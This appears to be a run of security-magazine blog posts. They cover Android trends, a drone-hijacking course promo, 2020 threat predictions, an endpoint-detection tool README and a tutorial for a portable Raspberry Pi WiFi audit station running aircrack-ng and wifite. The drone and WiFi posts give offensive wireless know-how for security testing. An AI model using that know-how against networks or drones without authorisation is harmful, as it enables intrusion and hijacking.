These numbers prove that Android is the biggest mobile app development platform. With Android app development, companies can reach out to a large user base, increase sales, and generate revenue. Through frequent technology updates, Android allows businesses to develop highly functional, secure, flexible, extensible and scalable apps in order to meet the ever-changing market trends. 

Lots of innovations are happening when it comes to Android app development trends. This post covers ten leading trends that may disrupt the mobile app industry. 

#1. Artificial Intelligence (AI) 

Introducing Artificial Intelligence in Android apps, businesses can improve user experiences by enabling customers with personalized offerings. The technology allows businesses to understand customers’ behavior, journey, product preferences, and many more details. With the data-driven approach, companies can formulate a better strategy for customer engagement by responding to their demands quickly. 

E-commerce businesses develop Android apps with AI to explore endless business opportunities, address clients’ specific needs, and generate adequate revenue. Harnessing the potential of AI, organizations can develop chatbots, advanced analytics systems, and machine learning techniques to deliver the best user experiences.

#2. Internet of Things 

An IoT based Android app creates a convenient environment for users to connect to IoT enabled devices. According to Statista, the number of connected devices worldwide was 15.41 billion in 2015 and it is expected to grow to 75.44 billion in 2025. It is an almost 60 billion increase in IoT enabled devices. 

Being the leading OS, Android will be the biggest partaker in this trend. It will be the preferred choice of businesses and developers for IoT app development. The mixture of IoT and Android apps can build IoT for Home, IoT for Workplace, IoT for Enterprises, and more.

#3. Augmented Reality (AR) & Virtual Reality (VR)

These technologies give users immersive experiences by overlaying digital elements on the real world or by creating a completely artificial environment as required. Building highly interactive AR and VR solutions using Android app development services helps businesses elevate the user experience by offering lifelike visual experiences. 

Lots of businesses are using AR and VR applications for marketing, product demonstration, sales, process learning, maintenance and repair, and more. Enterprise-oriented use cases of AR and VR include product and process training, on-field assistance, and so on. 

#4. Cloud-based Android App Development

To address customers' increasing demands and expectations, developers have started creating highly complex and feature-rich mobile apps. As the latest Android apps come with a lot of design elements, features, and functions, they require more space on the user's smartphone. 

With cloud-based Android applications, developers can seamlessly run data-driven apps, as cloud technology allows for real-time data loading, management, and processing. The essence of cloud-based Android apps is their inherent ease of access, anytime and anywhere. 

#5. Android Instant Apps

Google Play Instant allows users to use an app or game without any installation process. Android Instant Apps are stored and operated from the cloud, so users need not download them. The key benefit of such apps is that they do not take up extra space on the user's smartphone. Also, users can eliminate the clutter of unnecessary applications on their mobile devices. 

Recently, Google has launched advanced features for Android developers to help them develop small applications faster and allow users to use them without installing them. Android App Bundle, a new app publishing format from Google, brings businesses a step closer to developing Google Instant Apps quickly. And 2020 will witness the success of Android Instant Apps for sure.

#6. Chatbot

Chatbots are a very popular technology across the business world. They allow companies to provide intelligent responses to customers' queries, supplying them with the required information, boosting sales, and increasing revenue. Brands can deliver a better customer experience through instant messaging and close conversations quickly through chatbot solutions.

By integrating a chatbot into Android apps, organizations can reduce operational costs by cutting down the effort and resources spent on customer support. According to Gartner, twenty-five percent of customer service and support operations will integrate chatbot technology across engagement channels by 2020.

Soon businesses may tie up with an experienced mobile app development company that offers a complete range of Android app development services to build an application with a chatbot.

#7. Blockchain

Blockchain came into the limelight with the rise of cryptocurrency. Recently, a Blockchain Wallet App launched on the Google Play Store reached millions of downloads in a very short time span. It proves that the technology is trending and that innovative Android apps with Blockchain will get a good response from customers as well as developers.

These days, blockchain has gained more popularity than cloud applications due to its adequate security and viability. The technology keeps track of customers' digital transactions and ensures the security of clients' information.

#8. Kotlin

Kotlin is a highly popular programming language that allows the sharing of code between different platforms. It allows developers to build native apps with native instruments and libraries. Thus, developers prefer Kotlin over Java for Android app development.

The language runs on a JVM and is now compilable to a native binary through an LLVM-based backend. This capability can be used to write code for iOS or even other platforms such as Windows, Mac, etc. Moreover, Kotlin allows programmers to create and share the code for business logic, presenters, repositories, etc.

#9. In-app Search 

When users open a mobile app, lots of information and offerings are available on different screens of the application. It becomes a challenge for users to find the specific information they are looking for. The in-app search capability of Android apps helps users find exactly what they need. In-app search will stay a trend for the long term, as it is something users expect and demand.

#10. Android App Security

In the past, Google was receiving many complaints about breached app security: apps were accessing users' personal data without their permission. To address this issue, Google released an Android update that dealt with these app security breaches. Now, Android developers are integrating a permission module into their applications to make users' data more secure. The apps ask for the user's permission before accessing his or her personal information, and users have the right to allow or deny any permission.

Wrapping Up

To rock in 2020 and beyond, businesses have to consider all these Android app development trends to keep up with the fast-changing digital era. Incorporate emerging technologies into your Android app to deliver fast-paced, unified experiences and address customers' expectations. Many more Android app development trends will come and go, but as a business owner you need to evaluate the right set of technologies that help you seize opportunities and gain a competitive edge.

--------------------------------------------------------------------------------------------------------

About the Author: 

Being a CEO of the Android App Development Company - Credencys, Sandeep helps clients bridge the execution gap with services including: Consulting, Design & Architecture, Product strategy, software development, DevOps, Managed Services. With a motto of ‘Go Digital’, Sandeep delivers an Extraordinary Customer Experience to every client. Connect with Sandeep at sandeep@credencys.com


The post Top 10 Trends to Watch for Android App Development in 2020 by Sandeep Agarwal appeared first on Hakin9 - IT Security Magazine.

Capture a drone and take over [FREE COURSE CONTENT]


In this short video from our Drone Wi-Fi hacking blast course you'll see how to use a couple of popular tools, including Crozono and Metasploit, to capture a drone. Hacking a drone's connection to the network will allow you to hijack it. Drone hacking remains a hot topic in the field, so if you're not already on the train, hop on! 



This BLAST course is a self-contained workshop focused on one topic - drone hacking. To complete it you will need about 1 hour to get through the materials we publish, plus whatever time you'll need to perform the exercises. 

Once the drone hijacker grabs the key, an attacker can send malicious packets to restrict the original owner of the drone from sending legitimate control commands. Instead, the drone will accept commands from the attacker. You’ll learn how to hack a drone and connect to it.

Covered topics:

  • Connect to an open network
  • Connect to a secure network
  • Detect and identify
  • Gain access
  • Active decode
  • Intercept and control

Exercises:

  • Capture the drone - ONLINE LAB

What will you need?

  • Latest VMware Player, VMware Workstation, VMware Fusion or VirtualBox
  • Hard disk: minimum 15 GB of free space
  • RAM: 4 GB minimum, 6 GB recommended
  • Minimum dual-core CPU (Intel preferred: i3, i5 or i7)
  • 64-bit OS with administrator access: Windows, Linux or Mac OS
  • 2 free USB ports

Who is this course for?

  • This course is intended for everyone having an interest in security aspects related to hardware products or embedded devices.
  • Electronic enthusiasts and professionals

Instructor’s Bio & Picture:

Carlos Manzo Trujillo is a software and hardware engineer with extensive experience and management skills and works for a hi-tech telecommunication company. The company develops and sells solutions that enable service providers to efficiently deliver high quality voice and data services over broadband access networks while leveraging investment in their network infrastructure. As a senior engineer he is responsible for the development of management software and quality assurance software products produced by the company. Carlos has a CSE from UTEL University of Mexico City.


The post Capture a drone and take over [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.

5 Cyber Security Predictions For 2020 by Jonathan Krause


As technology continues to rapidly evolve, we can expect that cybercrimes will also increase. Hackers and cybercriminals will always try to find new vulnerabilities and loopholes. This year, we have witnessed some of the most high-end cyber-attacks. These have targeted both governmental organizations and worldwide companies.  

In March 2019, Russian hackers targeted different European agencies ahead of the European Union elections in May. The same month this year, United States officials reported that 27 universities had been a target of Chinese hackers. A month later, a pharmaceutical company known as Bayer announced that it had prevented hackers from stealing its sensitive intellectual property. And those are just the reported attacks. It's clear this type of activity will not be slowing down.

In this article, we are going to look at the top five cybersecurity trends for 2020. 

1. Increase in Mobile Malware 

With mobile usage at an all-time high, cybercriminals have a very big audience to target. With thousands of apps being downloaded every day, from mobile banking to online shopping, it's no wonder mobiles are becoming the prime target. A report by CrowdStrike predicts that criminals, as well as adversary groups, will increase their attacks on mobile devices in 2020, with sham mobile apps on the increase. According to Kaspersky Lab, there was a worrying rise in mobile malware disguised as legitimate banking apps, designed to steal money and credentials from users' accounts. The majority of mobile malware is distributed from third-party sources. Users should therefore be on the lookout for phishing messages delivered by email or SMS. It should go without saying that you should only ever download apps from trusted app stores.

2. Internet of Things (IoT) attacks 

Statista predicts that there will be over 30 billion connected devices come 2020. The truth of the matter is that Information Technology has been outpaced by the adoption of the Internet of Things. As a result, IoT devices will remain unmanaged, leading to a huge visibility gap. As the 5G network continues to roll out worldwide, cybersecurity will be a problem as data volumes and connected IoT devices rise, giving hackers more and more opportunities. There has been an increase in IoT attacks since the famous Mirai botnet attack back in 2016, and we can expect this type of cyber-attack to increase in 2020. Hackers will try to leverage more devices that can be used to deliver attacks such as misinformation and malware. Due to the nature of IoT, there are a lot of devices in several industries that can be targeted, including medical devices, industrial control systems and even cars. Getting access to these types of systems will allow hackers to pose a significant threat. If an IoT gadget does become compromised, your whole network could be next. Businesses must eliminate Internet of Things blind spots: they need to discover and classify the devices across the whole enterprise environment.

3. Targeted Ransomware 

The third trend to look out for in 2020 is targeted ransomware. This form of attack is very dangerous and poses a growing threat to many organizations today. In the last 2 years there has been a significant increase in targeted ransomware. If this type of attack is successful, it can be devastating for any business, large or small. In 2019, more and more groups have appeared, like RobbinHood, GoGalocker, and MegaCortex. GoGalocker, for example, deploys different detection evasion techniques, such as digitally signing the ransomware with legitimate certificates. This reduces the likelihood that it will get flagged as untrustworthy. You can be sure that in 2020 we will see a few high-profile attacks of this kind.

4. Open source hacking tool adoption 

Businesses are quickly adopting open source software. However, this presents a myriad of risks and security vulnerabilities. Open-source hacking is another cybersecurity threat that is expected to increase in 2020. This type of attack was seen in 2018 and 2019 and is favoured by hackers over custom-made malware. We saw new hacking tools being released by attackers in 2019 in dark web marketplaces as well as hacking forums. So, as we enter 2020, you can expect to see cybercriminals launching more complicated attacks, using better social engineering techniques, better tools, and broader targets. To safeguard against this risk, you need to evaluate your security controls to ensure that even the most basic security measures are followed. The Center for Internet Security offers organizations a prioritized set of controls that should be implemented.

5. Managed Service Providers (MSPs) are targeted by cybercriminals 

In 2019, cybercriminals aimed their attacks at external companies that remotely manage an organisation's IT systems (otherwise known as MSPs). They seized tools that were used to manage customer information, technology systems and vehicles. Managed Service Providers have been centre stage for high-profile attacks, which have eroded customer confidence. In recent years, ransomware attacks have targeted software that many Managed Services Providers use to manage operations. In 2019, Wipro warned that employee accounts were compromised during a phishing campaign that allowed attackers to use its systems to launch cyberattacks on customers. MSP attacks usually revolve around weak password management and compromised user credentials. To protect yourself against MSP attacks, you need to enforce a strong password policy. You can also enforce multifactor authentication as a policy if your systems are at high risk.

In Summary

It is expected that cybersecurity will continue to be a top priority for companies in the coming years. Businesses of all sizes are taking these threats more and more seriously, which of course they should be doing.

Data breaches continue to rise and cybercriminals are using complicated techniques such as Artificial Intelligence to penetrate well-secured systems.

Cybersecurity threats are becoming more dangerous than ever. Businesses need to employ new methods to protect and combat against these cyber threats throughout 2020 and beyond.


About the Author:

Jonathan Krause, Founder & Owner, Forensic Control

Jonathan is a leading cyber security and digital forensic specialist based in London, UK. After working as a computer forensic specialist in the Hi-Tech Crime Unit for the Metropolitan Police at New Scotland Yard, Jonathan founded Forensic Control in 2008. Since then, Jonathan and his team have advised on hundreds of data breaches for corporate clients of all sizes. Jonathan can be reached online at jonathan@forensiccontrol.com and at our company website https://www.forensiccontrol.com/


The post 5 Cyber Security Predictions For 2020 by Jonathan Krause appeared first on Hakin9 - IT Security Magazine.

Attack Monitor - Endpoint Detection And Malware Analysis Software


Attack Monitor is a Python application written to enhance the security monitoring capabilities of Windows 7/2008 (and all later versions) workstations/servers and to automate dynamic analysis of malware.

Current modes (mutually exclusive):

  • Endpoint detection (ED)
  • Malware analysis (on dedicated Virtual Machine)

Based on events from:

  • Windows event logs
  • Sysmon
  • Watchdog (Filesystem monitoring Python library)
  • TShark (only malware analysis mode)

Current version

0.9.0 (Alpha)

Contact

attack.monitor.github@gmail.com

Supported OS

  • Windows 7, 8, 10 (x86 or x64)
  • Windows 2008, 2012, 2016 (x86 or x64)

Pre-requirements

  • Powershell 5
  • Sysmon (Downloaded, configured and installed by installer.py)
  • Python 3.6 (64-bit) - should work on Python 3.x
  • Tshark (Malware analysis only)
  • Various Python3 libraries (requirements.txt)
  • StoneEngine library (included, published for the first time; a high-level Windows event log interface, in Alpha state)

Supported system events

Some of the events are only supported in Malware Analysis Mode.

  • Filesystem changes
  • Permitted network connections
  • PowerShell activity (detailed only with PowerShell 5)
  • Process creation
  • SMB activity
  • Scheduled tasks
  • Local accounts manipulations
  • Success/Failed logins
  • Drivers load
  • Raw disk access
  • Registry monitoring
  • Pipe events
  • Services
  • Audit log cleared
  • WMI monitoring of queries + WMI persistence
  • DNS requests capture (via Tshark)

Installation - Endpoint Detection Mode

For Malware analysis mode - refer to next section

STEPS:

cmd.exe (Run as admin)
pip3 install -U -r requirements.txt
python installer.py sysmon
  => Choose endpoint detection mode
python installer.py psaudit
python installer.py auditpol
python installer.py install
  => Choose endpoint detection mode
python installer.py exceptions
[Apply section] Installation - How to enable WMI audit?

Installation - Malware analysis Mode

For Endpoint detection mode - refer to previous section:

STEPS:

cmd.exe (Run as admin)
pip3 install -U -r requirements.txt
python installer.py sysmon
  => Choose malware analysis mode
python installer.py psaudit
python installer.py auditpol
python installer.py install
  => Choose malware analysis mode
[Install tshark] https://www.wireshark.org/download.html // To default location
[Apply section] Installation - How to choose network interface for malware listening? // (currently only DNS)
[Apply section] Installation - How to enable WMI audit?
[Apply section] Installation - How to monitor specific directories?

Installation - How to enable WMI audit?

compmgmt.msc
Services and Applications -> WMI Control -> Properties
Security -> Security -> Advanced -> Auditing -> Add

Select principal: Everyone
Type: All
Show advanced permissions:
  Select all (Execute Methods ... Edit Security)

Why isn't this in the installer.py script? It's hard to do programmatically.

Installation - How to choose network interface for malware listening?

Edit C:\Program Files\Attack Monitor\config\attack_monitor.cfg

Change in section [feeder_network_tshark]: network_interface=PUT INTERFACE NAME HERE # without quotes

How to determine the interface name?

TShark uses the adapter name from Control Panel\Network and Internet\Network Connections (Change adapter settings), e.g. "WiFi AC" (a custom name defined by the user) or "Ethernet0".

Installation - How to monitor specific directories?

Edit C:\Program Files\Attack Monitor\config\monitored_directories.json

For malware analysis it's recommended to monitor all events (except dir_modified) for the directory C:\ with the recursive flag enabled. Please also add additional directories if relevant.

How does it work?

  1. An alert arrives from a source (Windows Event Log, Sysmon, filesystem change, TShark).
  2. The alert is checked against config\exceptions\exception.json, which contains all alerts that should be ignored.
     A) For Endpoint Detection, a predefined set of ignored alerts is delivered with the software.
     B) For Malware Analysis, you need to add the exceptions yourself on a live system in a clean state.
  3. Is the alert present in exception.json? Yes: it is discarded (go to step 1). No: go to the next step.
  4. Is learning mode enabled? (It can be enabled from the tray icon, or permanently in the configuration file.) Yes: an alert window pops up asking whether you want to ignore this alert and, if so, which fields must match for an event to be considered ignored (simple comparison, substring, regex).
     • If you decide to add an exception for this alert, it is added to the exceptions (go to step 1).
     • If you decide to skip the exception window, go to the next step.
  5. The user is alerted about the captured event. Outputs:
     • System tray balloon notification (only when you are moving the mouse and the computer isn't locked).
     • The alert is saved to logs\.txt
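The exception-matching flow above, as an added example in Python (not Attack Monitor's own code): the rule layout, field names and sample alerts are constructed assumptions, not the real exception.json format, but the three match modes (exact, substring, regex), the per-source lookup and the learning-mode feedback loop follow the steps listed.

```python
import copy
import re

# Constructed exception list (assumed layout, not the project's real file format).
# Each rule applies to one alert source; every listed field must match for the
# alert to be ignored, using one of the three modes described in the README.
CONSTRUCTED_EXCEPTIONS = [
    {"source": "sysmon",
     "fields": {"event": {"mode": "exact", "value": "process_create"},
                "image": {"mode": "substring", "value": r"\Windows\System32\svchost.exe"}}},
    {"source": "filesystem",
     "fields": {"path": {"mode": "regex", "value": r"^C:\\Windows\\Temp\\.*\.tmp$"}}},
]

# Constructed sample alerts, as the feeders might produce them.
CONSTRUCTED_ALERTS = [
    {"source": "sysmon", "event": "process_create",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"source": "sysmon", "event": "process_create",          # look-alike binary outside System32:
     "image": r"C:\Users\Public\svchost.exe", "cmdline": "svchost.exe"},  # must NOT be excepted
    {"source": "filesystem", "event": "created", "path": r"C:\Windows\Temp\abc123.tmp"},
    {"source": "filesystem", "event": "created", "path": r"C:\Windows\Temp\payload.exe"},
    {"source": "filesystem", "event": "created", "path": r"C:\Windows\Temp\stage2.tmp"},
    {"source": "filesystem", "event": "created", "path": r"C:\Windows\Temp\agent.log"},
    {"source": "filesystem", "event": "created", "path": r"C:\Windows\Temp\agent.log"},
]


def field_matches(mode, pattern, actual):
    """One field comparison; a missing field never matches, so rules fail closed."""
    if actual is None:
        return False
    if mode == "exact":
        return actual == pattern
    if mode == "substring":
        return pattern in actual
    if mode == "regex":
        return re.search(pattern, actual) is not None
    raise ValueError(f"unknown match mode: {mode}")


def is_excepted(alert, exceptions):
    """Step 3: is this alert covered by any rule for its source?"""
    for rule in exceptions:
        if rule["source"] != alert["source"]:
            continue
        if all(field_matches(spec["mode"], spec["value"], alert.get(name))
               for name, spec in rule["fields"].items()):
            return True
    return False


def triage(alerts, exceptions, learning_decision=None):
    """Run steps 1-5 over a batch. `learning_decision(alert)` stands in for the
    learning-mode popup: it returns a new rule to add, or None to let the alert through.
    Rules added this way take effect for later alerts in the same batch (step 1 again)."""
    surfaced = []
    for alert in alerts:
        if is_excepted(alert, exceptions):
            continue                                   # discarded, back to step 1
        if learning_decision is not None:              # learning mode enabled
            new_rule = learning_decision(alert)
            if new_rule is not None:
                exceptions.append(new_rule)
                continue
        surfaced.append(alert)                         # step 5: notify / write to log
    return surfaced


def demo_learning_decision(alert):
    """Constructed stand-in for the interactive popup: ignore .log writes by exact path."""
    if alert["source"] == "filesystem" and alert.get("path", "").lower().endswith(".log"):
        return {"source": "filesystem",
                "fields": {"path": {"mode": "exact", "value": alert["path"]}}}
    return None


def run_demo():
    """Triage the constructed alerts against a private copy of the exception list."""
    exceptions = copy.deepcopy(CONSTRUCTED_EXCEPTIONS)
    surfaced = triage(CONSTRUCTED_ALERTS, exceptions, demo_learning_decision)
    return surfaced, exceptions


if __name__ == "__main__":
    for alert in run_demo()[0]:
        print("ALERT", alert)
```

Only the look-alike svchost.exe and the .exe dropped in Temp are surfaced; the first agent.log write is turned into an exact-path exception by the learning stand-in, so the second one is silently discarded.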

Known bugs

  • Exit isn't graceful
  • Tray icon appears and disappears

Download tool and support author: https://github.com/yarox24/attack_monitor

The post Attack Monitor - Endpoint Detection And Malware Analysis Software appeared first on Hakin9 - IT Security Magazine.

Portable station to perform WiFi network audits, using Raspberry Pi Zero W and Raspberry Pi 3


Station to perform WiFi network audits, using a Raspberry Pi Zero W or Raspberry Pi 3, controlled from a cell phone over Bluetooth or mobile data.

Always use technology to improve the world; if you are a black hat or gray hat hacker please abstain at this point, or at least leave your star to make me feel less guilty XP.

Introduction

In today's world, computer security is one of the main concerns of people and companies, but we are certainly exposed to attacks by black hat hackers, who only seek to do evil and use their skills to harm companies, people or even you.

So it occurred to me that it would be incredible to be able to perform security tests of wireless networks with a simple system such as a Raspberry; however, one of the great disadvantages of these is the need for display systems such as HDMI screens and keyboards to enter the commands.

In this case the project explains how to make a system based on a Raspberry Pi Zero W with a Bluetooth serial or WiFi SSH connection to a smartphone, so that it is possible to type the commands on the console using the smartphone.

Materials

Hardware:

  • Raspberry Pi Zero W.
  • SD card (min 8 GB).
  • Bluetooth module HC-06 (or similar).
  • OTG adapter.
  • PCB Breadboard.
  • Female Header.
  • USB cable to MicroUSB.
  • Arduino or TTL serial interface
  • Smartphone.
    • Android supports Bluetooth serial and WiFi SSH.
    • iPhone supports only WiFi SSH.
  • Powerbank 5 V (min 2000 mAh to ensure the card can stay on for at least 2 hours).
  • Any external network card, I use an AirLink101 (AWLL3028).

(check that it is compatible with the airmon-ng tool of Aircrack-ng)

https://www.aircrack-ng.org/doku.php?id=en:compatible_cards

Note: check the compatibility of your network card so that it can enter monitor mode; if that is not possible you cannot continue with the tutorial.

Software:

Bt Module

The first thing to do is set up the module for Bluetooth communication with the Raspberry. For this we must first configure the name and baud rate of the Bluetooth module to 115200 baud, since the Raspberry uses this transmission speed.

  • We connect the serial TTL to the module: Rx to Tx (green), Tx to Rx (white), Vcc to Vcc (red) and GND to GND (black).

  • Once connected we open the serial monitor we have installed, for example PuTTY (https://www.putty.org/).

  • Once we connect to the interface at 9600 baud (the default baud rate), we have to send the following commands to the Bluetooth module; all commands are sent in uppercase and without NL or CR.
    • AT (to confirm that the module is receiving the commands.)
      • Answer: OK
    • AT+NAMEdevicename (to set the device name.)
      • Answer: OKsetname
    • AT+PINyourpin
      • Answer: OKSetpin
    • AT+BAUD8 (115200 Baud Rate)
      • Answer: OK115200
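The AT sequence above, scripted as an added Python example (not part of the original project): it drives any port object exposing write(bytes) and read(n) -> bytes with a read timeout, such as a pyserial Serial opened at 9600 baud, and it assumes the HC-06 is still in its default state. The in-memory FakeHC06 is a constructed stand-in so the flow can be exercised without hardware.

```python
import time

# (command template, expected reply prefix) pairs from the tutorial.
# HC-06 wants the command in uppercase with NO trailing CR/LF; replies carry
# no terminator either, so we read until the expected prefix shows up or we time out.
AT_SETUP = [
    ("AT", "OK"),
    ("AT+NAME{name}", "OKsetname"),
    ("AT+PIN{pin}", "OKSetpin"),
    ("AT+BAUD8", "OK115200"),      # after this reply the port must be reopened at 115200
]


def send_at(port, command, expected, timeout=1.0):
    """Send one AT command and return the module's reply, or raise if it is not
    the expected one. Reply case is ignored: firmware variants differ in casing."""
    port.write(command.encode("ascii"))
    deadline = time.monotonic() + timeout
    reply = b""
    while time.monotonic() < deadline:
        chunk = port.read(32)
        if chunk:
            reply += chunk
            if reply.lower().startswith(expected.encode("ascii").lower()):
                break
        else:
            time.sleep(0.02)
    text = reply.decode("ascii", "replace")
    if not text.lower().startswith(expected.lower()):
        raise RuntimeError(f"{command!r}: expected {expected!r}, got {text!r}")
    return text


def configure_hc06(port, name, pin, gap=1.0):
    """Run the whole setup; returns [(command, reply), ...] in order.
    `gap` is the pause between commands (the module needs a short silence
    after each command before it processes the next one; set 0 for a fake port)."""
    if not (pin.isdigit() and len(pin) == 4):
        raise ValueError("HC-06 PIN must be exactly 4 digits")
    results = []
    for template, expected in AT_SETUP:
        cmd = template.format(name=name, pin=pin)
        results.append((cmd, send_at(port, cmd, expected)))
        time.sleep(gap)
    return results


class FakeHC06:
    """Constructed in-memory stand-in for the serial port (offline exercise only)."""

    def __init__(self):
        self.pending = b""
        self.log = []

    def write(self, data):
        cmd = data.decode("ascii")
        self.log.append(cmd)
        if cmd == "AT":
            self.pending = b"OK"
        elif cmd.startswith("AT+NAME"):
            self.pending = b"OKsetname"
        elif cmd.startswith("AT+PIN"):
            self.pending = b"OKsetPIN"      # real modules reply in this casing
        elif cmd == "AT+BAUD8":
            self.pending = b"OK115200"
        else:
            self.pending = b""               # unknown command: silence, caller times out

    def read(self, n):
        out, self.pending = self.pending[:n], self.pending[n:]
        return out


if __name__ == "__main__":
    # With real hardware: port = serial.Serial("COM3", 9600, timeout=1)  (pyserial, assumed)
    for cmd, reply in configure_hc06(FakeHC06(), "pistation", "1234", gap=0):
        print(f"{cmd:<20} -> {reply}")
```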

Once this configuration is finished, we connect the module to the Raspberry through its UART port, as shown in the following diagram.

I recommend that you build the circuit on a breadboard PCB, as shown in the following 2 images, so that the module can be transported without cables being disconnected by movement.

Raspberry Setup

For this tutorial we will use the Raspberry Pi Zero W, due to its small size, low power consumption and ease of use; it is also possible to use a Raspberry Pi 3, but you will need a much more powerful power bank, and the size is much bigger.

  • Download "RASPBIAN STRETCH LITE" from https://www.raspberrypi.org/downloads/raspbian/.
    • You can install the desktop version if you want, but it is best to use the lite version to improve the performance of the Raspberry Pi Zero W.
  • Flash Raspbian onto the SD card as indicated on the official page: https://www.raspberrypi.org/documentation/installation/installing-images/README.md
  • Once the operating system is on the SD card, 2 disk partitions will have been created on it; we enter the one called "boot".
    • Open the file called config.txt
    • At the end of the file put the following text, "enable_uart=1", and save.
  • Download the two files in the "files" folder and copy them to the "boot" partition.
  • Once both files are in "boot", open the file "wpa_supplicant.conf" and replace the ssid and psk (password) with your network name and password, without removing the quotes. (Below I show the example.)

    country=US
    update_config=1
    ctrl_interface=/var/run/wpa_supplicant

    network={
        scan_ssid=1
        ssid="networkname"
        psk="password"
    }
  • We do this to activate serial communication for the Bluetooth module and communication via SSH (iPhone compatibility). However, it must be clarified that if the station is used through SSH, we must fill in wpa_supplicant.conf with the network shared by the smartphone.

Note: I recommend that you first do the configuration with your home network because you have to download files.

Software Setup

  • Insert the SD card into the Raspberry and connect the power.
  • Wait 3 minutes for the operating system to finish configuring.
  • Open the Advanced IP Scanner or Angry IP Scanner program and perform a full scan; you can identify the Raspberry because it appears as shown below.

  • Once the IP is found, open the "Putty" program, put the IP in the box that says "Host Name" and press "Open" below.
  • When the word "login" appears, type "pi" and press Enter; for the password type "raspberry" and press Enter.
  • Once we are in the Linux command console, we need to run the following commands (this process may take a long time depending on the internet connection).
    • sudo apt-get -y install libssl-dev libnl-3-dev libnl-genl-3-dev ethtool
    • sudo apt-get install aircrack-ng
    • sudo apt-get install wifite
  • Once we have finished this, we can start to run tests with the Raspberry.

Note: DON'T run "sudo apt-get update" or "sudo apt-get upgrade", as this may corrupt the operating system and ruin the entire previous process.

Make Portable

  • Connect all the hardware:
    • Raspberry
    • Network card
    • Bluetooth module.
  • After that, connect the Raspberry to the power bank.
  • Once this is done, pair the Bluetooth module from the Bluetooth settings of the cell phone (only valid on Android).
  • Once pairing is done, open the Bluetooth Terminal app, select the dots in the upper right corner, press the "Setup" option, select the option "Append newline(\r\n)" and press "save".
  • Select the dots in the upper right corner, press the option "Connect a device - Secure" and select the device.
  • Note: the module may require several attempts to connect; keep trying if it does not connect.
  • Once connected, type "pi" and then press "Send".
  • Then type "raspberry" and press "Send".
  • You will notice that the Linux command console appears.

SSH Setup (Optional)

  • At this point we have activated SSH on the Raspberry; now we will use that configuration to connect over the cell phone's mobile data.
  • First we will have to configure the "wpa_supplicant.conf" of the Raspberry with the SSID and key of our "personal hotspot".
  • There are several ways to find the IP of the Raspberry at this point; this only has to be done once.
    • Option 1: Once the "wpa_supplicant.conf" file is modified, connect from the PC to our hotspot and scan the cellular network so as to find the IP of the Raspberry.
    • Option 2: Connect the BT terminal from an Android device and type "hostname -I" to find the IP.
    • Option 3: Connect the Raspberry to a screen; once the terminal opens, type "hostname -I" and it gives us the IP.
    • Option 4: Connect the USB TTL that we used to configure the Bluetooth module to the Raspberry, log in by typing "pi", "raspberry", and once in the Linux terminal type "hostname -I" to obtain the IP.
  • Once we have the IP, we open MobileSSH or WebSSH as the case may be and log in to the Linux terminal.

An example of the device running with the iPhone's mobile hotspot and running Wifite on an SSH console.

References:

Github page and further information: https://github.com/altaga/Portable-Hacking-Station-RPI

The post Portable station to perform WiFi network audits, using Raspberry Pi Zero W and Raspberry Pi 3 appeared first on Hakin9 - IT Security Magazine.
